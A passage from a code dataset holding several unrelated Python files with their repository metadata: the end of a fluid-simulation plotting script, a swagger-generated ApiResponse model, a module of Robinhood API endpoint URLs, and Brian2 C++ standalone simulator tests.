velocity_magnitude,
levels=50,
cmap=cmr.amber,
)
plt.colorbar().set_label("Velocity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
plt.subplot(212)
plt.contourf(
X,
Y,
curl,
levels=50,
cmap=cmr.redshift,
vmin=-0.02,
vmax= 0.02,
)
plt.colorbar().set_label("Vorticity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
plt.draw()
plt.pause(0.0001)
plt.clf()
if VISUALIZE:
plt.show()
if __name__ == "__main__":
main()
| true | true |
f7234c418b6f763bd052bb739df4ad8099e6768f | 2,721 | py | Python | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | 1 | 2020-09-06T18:36:28.000Z | 2020-09-06T18:36:28.000Z | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | 1 | 2022-03-31T18:34:51.000Z | 2022-03-31T18:34:51.000Z | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ApiResponse(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, code: int=None, type: str=None, message: str=None): # noqa: E501
"""ApiResponse - a model defined in Swagger
:param code: The code of this ApiResponse. # noqa: E501
:type code: int
:param type: The type of this ApiResponse. # noqa: E501
:type type: str
:param message: The message of this ApiResponse. # noqa: E501
:type message: str
"""
self.swagger_types = {
'code': int,
'type': str,
'message': str
}
self.attribute_map = {
'code': 'code',
'type': 'type',
'message': 'message'
}
self._code = code
self._type = type
self._message = message
@classmethod
def from_dict(cls, dikt) -> 'ApiResponse':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ApiResponse of this ApiResponse. # noqa: E501
:rtype: ApiResponse
"""
return util.deserialize_model(dikt, cls)
@property
def code(self) -> int:
"""Gets the code of this ApiResponse.
:return: The code of this ApiResponse.
:rtype: int
"""
return self._code
@code.setter
def code(self, code: int):
"""Sets the code of this ApiResponse.
:param code: The code of this ApiResponse.
:type code: int
"""
self._code = code
@property
def type(self) -> str:
"""Gets the type of this ApiResponse.
:return: The type of this ApiResponse.
:rtype: str
"""
return self._type
@type.setter
def type(self, type: str):
"""Sets the type of this ApiResponse.
:param type: The type of this ApiResponse.
:type type: str
"""
self._type = type
@property
def message(self) -> str:
"""Gets the message of this ApiResponse.
:return: The message of this ApiResponse.
:rtype: str
"""
return self._message
@message.setter
def message(self, message: str):
"""Sets the message of this ApiResponse.
:param message: The message of this ApiResponse.
:type message: str
"""
self._message = message
| 23.66087 | 88 | 0.570379 |
from __future__ import absolute_import
from datetime import date, datetime
from typing import List, Dict
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ApiResponse(Model):
def __init__(self, code: int=None, type: str=None, message: str=None):
self.swagger_types = {
'code': int,
'type': str,
'message': str
}
self.attribute_map = {
'code': 'code',
'type': 'type',
'message': 'message'
}
self._code = code
self._type = type
self._message = message
@classmethod
def from_dict(cls, dikt) -> 'ApiResponse':
return util.deserialize_model(dikt, cls)
@property
def code(self) -> int:
return self._code
@code.setter
def code(self, code: int):
self._code = code
@property
def type(self) -> str:
return self._type
@type.setter
def type(self, type: str):
self._type = type
@property
def message(self) -> str:
return self._message
@message.setter
def message(self, message: str):
self._message = message
| true | true |
f7234db37ba135caeb76fb9bc59c861d43cdb040 | 6,054 | py | Python | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | robin_stocks/urls.py | jacov/robin_stocks | c7dba7f9680be7d518577fcfce2a3edecf5a13a1 | [
"MIT"
] | null | null | null | """Contains all the url endpoints for interacting with Robinhood API."""
from robin_stocks.helper import id_for_chain, id_for_stock
# Login
def login_url():
return('https://api.robinhood.com/oauth2/token/')
def challenge_url(challenge_id):
return('https://api.robinhood.com/challenge/{0}/respond/'.format(challenge_id))
# Profiles
def account_profile():
return('https://api.robinhood.com/accounts/')
def basic_profile():
return('https://api.robinhood.com/user/basic_info/')
def investment_profile():
return('https://api.robinhood.com/user/investment_profile/')
def portfolio_profile():
return('https://api.robinhood.com/portfolios/')
def security_profile():
return('https://api.robinhood.com/user/additional_info/')
def user_profile():
return('https://api.robinhood.com/user/')
# Stocks
def earnings():
return('https://api.robinhood.com/marketdata/earnings/')
def events():
return('https://api.robinhood.com/options/events/')
def fundamentals():
return('https://api.robinhood.com/fundamentals/')
def historicals():
return('https://api.robinhood.com/quotes/historicals/')
def instruments():
return('https://api.robinhood.com/instruments/')
def news(symbol):
return('https://api.robinhood.com/midlands/news/{0}/?'.format(symbol))
def popularity(symbol):
return('https://api.robinhood.com/instruments/{0}/popularity/'.format(id_for_stock(symbol)))
def quotes():
return('https://api.robinhood.com/quotes/')
def ratings(symbol):
return('https://api.robinhood.com/midlands/ratings/{0}/'.format(id_for_stock(symbol)))
def splits(symbol):
return('https://api.robinhood.com/instruments/{0}/splits/'.format(id_for_stock(symbol)))
# account
def positions():
return('https://api.robinhood.com/positions/')
def banktransfers():
return('https://api.robinhood.com/ach/transfers/')
def daytrades(account):
return('https://api.robinhood.com/accounts/{0}/recent_day_trades/'.format(account))
def dividends():
return('https://api.robinhood.com/dividends/')
def documents():
return('https://api.robinhood.com/documents/')
def linked(id=None, unlink=False):
if unlink:
return('https://api.robinhood.com/ach/relationships/{0}/unlink/'.format(id))
if id:
return('https://api.robinhood.com/ach/relationships/{0}/'.format(id))
else:
return('https://api.robinhood.com/ach/relationships/')
def margin():
return('https://api.robinhood.com/margin/calls/')
def margininterest():
return('https://api.robinhood.com/cash_journal/margin_interest_charges/')
def notifications(tracker=False):
if tracker:
return('https://api.robinhood.com/midlands/notifications/notification_tracker/')
else:
return('https://api.robinhood.com/notifications/devices/')
def referral():
return('https://api.robinhood.com/midlands/referral/')
def stockloan():
return('https://api.robinhood.com/stock_loan/payments/')
def subscription():
return('https://api.robinhood.com/subscription/subscription_fees/')
def wiretransfers():
return('https://api.robinhood.com/wire/transfers')
def watchlists(name=None, add=False):
if add:
return('https://api.robinhood.com/watchlists/{0}/bulk_add/'.format(name))
if name:
return('https://api.robinhood.com/watchlists/{0}/'.format(name))
else:
return('https://api.robinhood.com/watchlists/')
# markets
def currency():
return('https://nummus.robinhood.com/currency_pairs/')
def markets():
return('https://api.robinhood.com/markets/')
def movers():
return('https://api.robinhood.com/midlands/movers/sp500/')
# options
def aggregate():
return('https://api.robinhood.com/options/aggregate_positions/')
def chains(symbol):
return('https://api.robinhood.com/options/chains/{0}/'.format(id_for_chain(symbol)))
def option_historicals(id):
return('https://api.robinhood.com/marketdata/options/historicals/{0}/'.format(id))
def option_instruments(id=None):
if id:
return('https://api.robinhood.com/options/instruments/{0}/'.format(id))
else:
return('https://api.robinhood.com/options/instruments/')
def option_orders(orderID=None):
if orderID:
return('https://api.robinhood.com/options/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/options/orders/')
def option_positions():
return('https://api.robinhood.com/options/positions/')
def marketdata_options(id):
return('https://api.robinhood.com/marketdata/options/{0}/'.format(id))
# pricebook
def marketdata_quotes(id):
return ('https://api.robinhood.com/marketdata/quotes/{0}/'.format(id))
def marketdata_pricebook(id):
return ('https://api.robinhood.com/marketdata/pricebook/snapshots/{0}/'.format(id))
# crypto
def order_crypto():
return('https://nummus.robinhood.com/orders/')
def crypto_account():
return('https://nummus.robinhood.com/accounts/')
def crypto_currency_pairs():
return('https://nummus.robinhood.com/currency_pairs/')
def crypto_quote(id):
return('https://api.robinhood.com/marketdata/forex/quotes/{0}/'.format(id))
def crypto_holdings():
return('https://nummus.robinhood.com/holdings/')
def crypto_historical(id):
return('https://api.robinhood.com/marketdata/forex/historicals/{0}/'.format(id))
def crypto_orders(orderID=None):
if orderID:
return('https://nummus.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://nummus.robinhood.com/orders/')
def crypto_cancel(id):
return('https://nummus.robinhood.com/orders/{0}/cancel/'.format(id))
# orders
def cancel(url):
return('https://api.robinhood.com/orders/{0}/cancel/'.format(url))
def option_cancel(id):
return('https://api.robinhood.com/options/orders/{0}/cancel/'.format(id))
def orders(orderID=None):
if orderID:
return('https://api.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/orders/')
| 22.674157 | 96 | 0.693261 | from robin_stocks.helper import id_for_chain, id_for_stock
def login_url():
return('https://api.robinhood.com/oauth2/token/')
def challenge_url(challenge_id):
return('https://api.robinhood.com/challenge/{0}/respond/'.format(challenge_id))
def account_profile():
return('https://api.robinhood.com/accounts/')
def basic_profile():
return('https://api.robinhood.com/user/basic_info/')
def investment_profile():
return('https://api.robinhood.com/user/investment_profile/')
def portfolio_profile():
return('https://api.robinhood.com/portfolios/')
def security_profile():
return('https://api.robinhood.com/user/additional_info/')
def user_profile():
return('https://api.robinhood.com/user/')
def earnings():
return('https://api.robinhood.com/marketdata/earnings/')
def events():
return('https://api.robinhood.com/options/events/')
def fundamentals():
return('https://api.robinhood.com/fundamentals/')
def historicals():
return('https://api.robinhood.com/quotes/historicals/')
def instruments():
return('https://api.robinhood.com/instruments/')
def news(symbol):
return('https://api.robinhood.com/midlands/news/{0}/?'.format(symbol))
def popularity(symbol):
return('https://api.robinhood.com/instruments/{0}/popularity/'.format(id_for_stock(symbol)))
def quotes():
return('https://api.robinhood.com/quotes/')
def ratings(symbol):
return('https://api.robinhood.com/midlands/ratings/{0}/'.format(id_for_stock(symbol)))
def splits(symbol):
return('https://api.robinhood.com/instruments/{0}/splits/'.format(id_for_stock(symbol)))
def positions():
return('https://api.robinhood.com/positions/')
def banktransfers():
return('https://api.robinhood.com/ach/transfers/')
def daytrades(account):
return('https://api.robinhood.com/accounts/{0}/recent_day_trades/'.format(account))
def dividends():
return('https://api.robinhood.com/dividends/')
def documents():
return('https://api.robinhood.com/documents/')
def linked(id=None, unlink=False):
if unlink:
return('https://api.robinhood.com/ach/relationships/{0}/unlink/'.format(id))
if id:
return('https://api.robinhood.com/ach/relationships/{0}/'.format(id))
else:
return('https://api.robinhood.com/ach/relationships/')
def margin():
return('https://api.robinhood.com/margin/calls/')
def margininterest():
return('https://api.robinhood.com/cash_journal/margin_interest_charges/')
def notifications(tracker=False):
if tracker:
return('https://api.robinhood.com/midlands/notifications/notification_tracker/')
else:
return('https://api.robinhood.com/notifications/devices/')
def referral():
return('https://api.robinhood.com/midlands/referral/')
def stockloan():
return('https://api.robinhood.com/stock_loan/payments/')
def subscription():
return('https://api.robinhood.com/subscription/subscription_fees/')
def wiretransfers():
return('https://api.robinhood.com/wire/transfers')
def watchlists(name=None, add=False):
if add:
return('https://api.robinhood.com/watchlists/{0}/bulk_add/'.format(name))
if name:
return('https://api.robinhood.com/watchlists/{0}/'.format(name))
else:
return('https://api.robinhood.com/watchlists/')
def currency():
return('https://nummus.robinhood.com/currency_pairs/')
def markets():
return('https://api.robinhood.com/markets/')
def movers():
return('https://api.robinhood.com/midlands/movers/sp500/')
def aggregate():
return('https://api.robinhood.com/options/aggregate_positions/')
def chains(symbol):
return('https://api.robinhood.com/options/chains/{0}/'.format(id_for_chain(symbol)))
def option_historicals(id):
return('https://api.robinhood.com/marketdata/options/historicals/{0}/'.format(id))
def option_instruments(id=None):
if id:
return('https://api.robinhood.com/options/instruments/{0}/'.format(id))
else:
return('https://api.robinhood.com/options/instruments/')
def option_orders(orderID=None):
if orderID:
return('https://api.robinhood.com/options/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/options/orders/')
def option_positions():
return('https://api.robinhood.com/options/positions/')
def marketdata_options(id):
return('https://api.robinhood.com/marketdata/options/{0}/'.format(id))
def marketdata_quotes(id):
return ('https://api.robinhood.com/marketdata/quotes/{0}/'.format(id))
def marketdata_pricebook(id):
return ('https://api.robinhood.com/marketdata/pricebook/snapshots/{0}/'.format(id))
def order_crypto():
return('https://nummus.robinhood.com/orders/')
def crypto_account():
return('https://nummus.robinhood.com/accounts/')
def crypto_currency_pairs():
return('https://nummus.robinhood.com/currency_pairs/')
def crypto_quote(id):
return('https://api.robinhood.com/marketdata/forex/quotes/{0}/'.format(id))
def crypto_holdings():
return('https://nummus.robinhood.com/holdings/')
def crypto_historical(id):
return('https://api.robinhood.com/marketdata/forex/historicals/{0}/'.format(id))
def crypto_orders(orderID=None):
if orderID:
return('https://nummus.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://nummus.robinhood.com/orders/')
def crypto_cancel(id):
return('https://nummus.robinhood.com/orders/{0}/cancel/'.format(id))
def cancel(url):
return('https://api.robinhood.com/orders/{0}/cancel/'.format(url))
def option_cancel(id):
return('https://api.robinhood.com/options/orders/{0}/cancel/'.format(id))
def orders(orderID=None):
if orderID:
return('https://api.robinhood.com/orders/{0}/'.format(orderID))
else:
return('https://api.robinhood.com/orders/')
| true | true |
f7234e411ec0118933284b5a74d1ea25b8cace95 | 15,644 | py | Python | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | 1 | 2019-03-31T09:02:08.000Z | 2019-03-31T09:02:08.000Z | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | null | null | null | brian2/tests/test_cpp_standalone.py | brian-team/brian2numba | 6958a9716bc87f04f8a40d0f6d7d4ed1140deb00 | [
"BSD-2-Clause"
] | null | null | null | import tempfile
from nose import with_setup, SkipTest
from nose.plugins.attrib import attr
from numpy.testing.utils import assert_allclose, assert_equal, assert_raises
from brian2 import *
from brian2.devices.device import reinit_devices, set_device, reset_device
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_cpp_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
##### Define the model
tau = 1*ms
eqs = '''
dV/dt = (-40*mV-V)/tau : volt (unless refractory)
'''
threshold = 'V>-50*mV'
reset = 'V=-60*mV'
refractory = 5*ms
N = 1000
G = NeuronGroup(N, eqs,
reset=reset,
threshold=threshold,
refractory=refractory,
name='gp')
G.V = '-i*mV'
M = SpikeMonitor(G)
S = Synapses(G, G, 'w : volt', on_pre='V += w')
S.connect('abs(i-j)<5 and i!=j')
S.w = 0.5*mV
S.delay = '0*ms'
net = Network(G, M, S)
net.run(100*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=with_output)
# we do an approximate equality here because depending on minor details of how it was compiled, the results
# may be slightly different (if -ffast-math is on)
assert len(M.i)>=17000 and len(M.i)<=18000
assert len(M.t) == len(M.i)
assert M.t[0] == 0.
assert M.t[-1] == 100*ms - defaultclock.dt
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_dt_changes_between_runs_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
G = NeuronGroup(1, 'v:1')
mon = StateMonitor(G, 'v', record=True)
run(.5*ms)
defaultclock.dt = .5*ms
run(.5*ms)
defaultclock.dt = 0.1*ms
run(.5*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(mon.t[:]) == 5 + 1 + 5
assert_allclose(mon.t[:],
[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 1., 1.1, 1.2, 1.3, 1.4]*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_multiple_connects(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'v:1')
S = Synapses(G, G, 'w:1')
S.connect(i=[0], j=[0])
S.connect(i=[1], j=[1])
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
run(0*ms)
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(S) == 2 and len(S.w[:]) == 2
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_storing_loading(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''v : volt
x : 1
n : integer
b : boolean''')
v = np.arange(10)*volt
x = np.arange(10, 20)
n = np.arange(20, 30)
b = np.array([True, False]).repeat(5)
G.v = v
G.x = x
G.n = n
G.b = b
S = Synapses(G, G, '''v_syn : volt
x_syn : 1
n_syn : integer
b_syn : boolean''')
S.connect(j='i')
S.v_syn = v
S.x_syn = x
S.n_syn = n
S.b_syn = b
run(0*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True, with_output=True)
assert_allclose(G.v[:], v)
assert_allclose(S.v_syn[:], v)
assert_allclose(G.x[:], x)
assert_allclose(S.x_syn[:], x)
assert_allclose(G.n[:], n)
assert_allclose(S.n_syn[:], n)
assert_allclose(G.b[:], b)
assert_allclose(S.b_syn[:], b)
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_consistency(with_output=False):
previous_device = get_device()
n_cells = 100
n_recorded = 10
numpy.random.seed(42)
taum = 20 * ms
taus = 5 * ms
Vt = -50 * mV
Vr = -60 * mV
El = -49 * mV
fac = (60 * 0.27 / 10)
gmax = 20*fac
dApre = .01
taupre = 20 * ms
taupost = taupre
dApost = -dApre * taupre / taupost * 1.05
dApost *= 0.1*gmax
dApre *= 0.1*gmax
connectivity = numpy.random.randn(n_cells, n_cells)
sources = numpy.random.random_integers(0, n_cells-1, 10*n_cells)
# Only use one spike per time step (to rule out that a single source neuron
# has more than one spike in a time step)
times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
replace=False)*ms
v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
eqs = Equations('''
dv/dt = (g-(v-El))/taum : volt
dg/dt = -g/taus : volt
''')
results = {}
for (n_threads, devicename) in [(0, 'runtime'),
(0, 'cpp_standalone'),
(1, 'cpp_standalone'),
(2, 'cpp_standalone'),
(3, 'cpp_standalone'),
(4, 'cpp_standalone')]:
set_device(devicename, build_on_run=False, with_output=False)
Synapses.__instances__().clear()
if devicename=='cpp_standalone':
reinit_devices()
prefs.devices.cpp_standalone.openmp_threads = n_threads
P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
Q = SpikeGeneratorGroup(n_cells, sources, times)
P.v = v_init
P.g = 0 * mV
S = Synapses(P, P,
model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
dApost/dt=-Apost/taupost : 1 (event-driven)
w : 1''',
pre = '''g += w*mV
Apre += dApre
w = w + Apost''',
post = '''Apost += dApost
w = w + Apre''')
S.connect()
S.w = fac*connectivity.flatten()
T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
T.connect(j='i')
T.w = 10*fac
spike_mon = SpikeMonitor(P)
rate_mon = PopulationRateMonitor(P)
state_mon = StateMonitor(S, 'w', record=range(n_recorded), dt=0.1*second)
v_mon = StateMonitor(P, 'v', record=range(n_recorded))
run(0.2 * second, report='text')
if devicename=='cpp_standalone':
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
results[n_threads, devicename] = {}
results[n_threads, devicename]['w'] = state_mon.w
results[n_threads, devicename]['v'] = v_mon.v
results[n_threads, devicename]['s'] = spike_mon.num_spikes
results[n_threads, devicename]['r'] = rate_mon.rate[:]
for key1, key2 in [((0, 'runtime'), (0, 'cpp_standalone')),
((1, 'cpp_standalone'), (0, 'cpp_standalone')),
((2, 'cpp_standalone'), (0, 'cpp_standalone')),
((3, 'cpp_standalone'), (0, 'cpp_standalone')),
((4, 'cpp_standalone'), (0, 'cpp_standalone'))
]:
assert_allclose(results[key1]['w'], results[key2]['w'])
assert_allclose(results[key1]['v'], results[key2]['v'])
assert_allclose(results[key1]['r'], results[key2]['r'])
assert_allclose(results[key1]['s'], results[key2]['s'])
reset_device(previous_device)
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_timedarray(with_output=True):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
ta1d = TimedArray(np.arange(10)*volt, dt=1*ms)
ta2d = TimedArray(np.arange(300).reshape(3, 100).T, dt=defaultclock.dt)
G = NeuronGroup(4, '''x = ta1d(t) : volt
y = ta2d(t, i) : 1''')
mon = StateMonitor(G, ['x', 'y'], record=True)
run(11*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
for idx in xrange(4):
# x variable should have neuron independent values
assert_equal(mon[idx].x[:],
np.clip(np.arange(11).repeat(10), 0, 9)*volt)
for idx in xrange(3):
# y variable is neuron-specific
assert_equal(mon[idx].y[:],
np.clip(np.arange(110), 0, 99) + idx*100)
# the 2d array only has 3 columns, the last neuron should therefore contain
# only NaN
assert_equal(mon[3].y[:], np.nan)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_duplicate_names_across_nets(with_output=True):
set_device('cpp_standalone', build_on_run=False)
# In standalone mode, names have to be globally unique, not just unique
# per network
obj1 = BrianObject(name='name1')
obj2 = BrianObject(name='name2')
obj3 = BrianObject(name='name3')
obj4 = BrianObject(name='name1')
net1 = Network(obj1, obj2)
net2 = Network(obj3, obj4)
net1.run(0*ms)
net2.run(0*ms)
assert_raises(ValueError, lambda: device.build())
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_scalar_writes(with_output=False):
# Test that writing to a scalar variable only is done once in an OpenMP
# setting (see github issue #551)
set_device('cpp_standalone', build_on_run=False)
prefs.devices.cpp_standalone.openmp_threads = 4
G = NeuronGroup(10, 's : 1 (shared)')
G.run_regularly('s += 1')
run(defaultclock.dt)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_equal(G.s[:], 1.0)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_time_after_run(with_output=False):
set_device('cpp_standalone', build_on_run=False)
# Check that the clock and network time after a run is correct, even if we
# have not actually run the code yet (via build)
G = NeuronGroup(10, 'dv/dt = -v/(10*ms) : 1')
net = Network(G)
assert_allclose(defaultclock.dt, 0.1*ms)
assert_allclose(defaultclock.t, 0.*ms)
assert_allclose(G.t, 0.*ms)
assert_allclose(net.t, 0.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 10.*ms)
assert_allclose(G.t, 10.*ms)
assert_allclose(net.t, 10.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
# Everything should of course still be accessible
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_array_cache(with_output=False):
# Check that variables are only accessible from Python when they should be
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''dv/dt = -v / (10*ms) : 1
w : 1
x : 1
y : 1
z : 1 (shared)''',
threshold='v>1')
S = Synapses(G, G, 'weight: 1', on_pre='w += weight')
S.connect(p=0.2)
S.weight = 7
# All neurongroup values should be known
assert_allclose(G.v, 0)
assert_allclose(G.w, 0)
assert_allclose(G.x, 0)
assert_allclose(G.y, 0)
assert_allclose(G.z, 0)
assert_allclose(G.i, np.arange(10))
# But the synaptic variable is not -- we don't know the number of synapses
assert_raises(NotImplementedError, lambda: S.weight[:])
# Setting variables with explicit values should not change anything
G.v = np.arange(10)+1
G.w = 2
G.y = 5
G.z = 7
assert_allclose(G.v, np.arange(10)+1)
assert_allclose(G.w, 2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# But setting with code should invalidate them
G.x = 'i*2'
assert_raises(NotImplementedError, lambda: G.x[:])
# Make sure that the array cache does not allow to use incorrectly sized
# values to pass
assert_raises(ValueError, lambda: setattr(G, 'w', [0, 2]))
assert_raises(ValueError, lambda: G.w.__setitem__(slice(0, 4), [0, 2]))
run(10*ms)
# v is now no longer known without running the network
assert_raises(NotImplementedError, lambda: G.v[:])
# Neither is w, it is updated in the synapse
assert_raises(NotImplementedError, lambda: G.w[:])
# However, no code touches y or z
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# i is read-only anyway
assert_allclose(G.i, np.arange(10))
# After actually running the network, everything should be accessible
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert all(G.v > 0)
assert all(G.w > 0)
assert_allclose(G.x, np.arange(10)*2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
assert_allclose(G.i, np.arange(10))
assert_allclose(S.weight, 7)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_active_flag_standalone(with_output=True):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(1, 'dv/dt = 1/ms : 1')
mon = StateMonitor(G, 'v', record=0)
mon.active = False
run(1*ms)
mon.active = True
G.active = False
run(1*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir)
# Monitor should start recording at 1ms
# Neurongroup should not integrate after 1ms (but should have integrated before)
assert_allclose(mon[0].t[0], 1*ms)
assert_allclose(mon[0].v, 1.0)
if __name__=='__main__':
# Print the debug output when testing this file only but not when running
# via nose test
for t in [
test_cpp_standalone,
test_dt_changes_between_runs_standalone,
test_multiple_connects,
test_storing_loading,
test_openmp_consistency,
test_timedarray,
test_duplicate_names_across_nets,
test_openmp_scalar_writes,
test_time_after_run,
test_array_cache,
test_active_flag_standalone
]:
t(with_output=True)
reinit_devices()
| 35.234234 | 111 | 0.59077 | import tempfile
from nose import with_setup, SkipTest
from nose.plugins.attrib import attr
from numpy.testing.utils import assert_allclose, assert_equal, assert_raises
from brian2 import *
from brian2.devices.device import reinit_devices, set_device, reset_device
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_cpp_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
tory)
'''
threshold = 'V>-50*mV'
reset = 'V=-60*mV'
refractory = 5*ms
N = 1000
G = NeuronGroup(N, eqs,
reset=reset,
threshold=threshold,
refractory=refractory,
name='gp')
G.V = '-i*mV'
M = SpikeMonitor(G)
S = Synapses(G, G, 'w : volt', on_pre='V += w')
S.connect('abs(i-j)<5 and i!=j')
S.w = 0.5*mV
S.delay = '0*ms'
net = Network(G, M, S)
net.run(100*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=with_output)
assert len(M.i)>=17000 and len(M.i)<=18000
assert len(M.t) == len(M.i)
assert M.t[0] == 0.
assert M.t[-1] == 100*ms - defaultclock.dt
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_dt_changes_between_runs_standalone(with_output=False):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
G = NeuronGroup(1, 'v:1')
mon = StateMonitor(G, 'v', record=True)
run(.5*ms)
defaultclock.dt = .5*ms
run(.5*ms)
defaultclock.dt = 0.1*ms
run(.5*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(mon.t[:]) == 5 + 1 + 5
assert_allclose(mon.t[:],
[0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 1., 1.1, 1.2, 1.3, 1.4]*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_multiple_connects(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'v:1')
S = Synapses(G, G, 'w:1')
S.connect(i=[0], j=[0])
S.connect(i=[1], j=[1])
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
run(0*ms)
device.build(directory=tempdir, compile=True, run=True,
with_output=True)
assert len(S) == 2 and len(S.w[:]) == 2
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_storing_loading(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''v : volt
x : 1
n : integer
b : boolean''')
v = np.arange(10)*volt
x = np.arange(10, 20)
n = np.arange(20, 30)
b = np.array([True, False]).repeat(5)
G.v = v
G.x = x
G.n = n
G.b = b
S = Synapses(G, G, '''v_syn : volt
x_syn : 1
n_syn : integer
b_syn : boolean''')
S.connect(j='i')
S.v_syn = v
S.x_syn = x
S.n_syn = n
S.b_syn = b
run(0*ms)
